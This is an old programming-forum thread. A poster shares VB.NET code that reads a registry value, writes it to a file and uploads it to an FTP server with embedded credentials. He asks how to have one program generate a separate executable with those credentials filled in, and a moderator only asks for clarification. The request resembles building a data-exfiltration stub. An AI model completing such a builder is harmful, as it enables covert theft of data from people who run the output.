Welcome to Dream.In.Code
Getting VB.NET Help is Easy!

Join 109,295 VB.NET Programmers for FREE! Ask your question and get quick answers from experts. There are 1,216 online right now! We've got more than 500 tutorials and 2,000 snippets. Join and find out why Dream.In.Code is the #1 programming help community on the internet! Registration is fast and FREE... Join Now!



VB exe making an seperate exe

 
Reply to this topicStart new topic

VB exe making an seperate exe

keaarori
post 30 Jun, 2008 - 05:56 AM
Post #1


New D.I.C Head

*
Joined: 30 Jun, 2008
Posts: 1

CODE
  
     Dim x
        Randomize()
        Randomize()
        Randomize()
dim x
        x = My.Computer.Registry.GetValue _
("HKEY_LOCAL_MACHINE\Software\myprogram", "mykey", Nothing)

        Dim streamwriter As System.IO.StreamWriter
        streamwriter = System.IO.File.AppendText("file.txt")
        streamwriter.WriteLine(x)
        streamwriter.Close()
        My.Computer.Network.UploadFile( _
"file.txt", _
"link" & TimeOfDay & ".txt", "usrname", "PW")


What I'm trying to do is make another program make another executable with a push of a button that gets the user name / password / ftp url in a separate executable.with this code but fill in the blanks. I'm stuck figuring out how I would do this. Any help would be greatly appreciated =).
User is offlineProfile CardPM

Go to the top of the page


jayman9
post 30 Jun, 2008 - 10:27 AM
Post #2


Student of Life

Group Icon
Joined: 26 Dec, 2005
Posts: 6,322



Thanked 22 times

Dream Kudos: 500

Expert In: C#, VB.NET, Java

My Contributions


Moved to VB.NET.

Does the executable that gets the username/password/ftp url, currently return this information?

What do you mean by fill in the blanks?

Can you clarify, in detail, what you need and where you are stuck?
User is online!Profile CardPM

Go to the top of the page

Fast ReplyReply to this topicStart new topic
Time is now: 9/6/08 09:30AM

Live VB.NET Help!

VB.NET Tutorials

Reference Sheets

VB.NET Snippets

Bye Bye Ads

Free DIC T-Shirt

T-Shirt Example

Related Sites

Monthly Drawing

Thumb Drive

Partners

Top Contributors

Top 10 Kudos This Month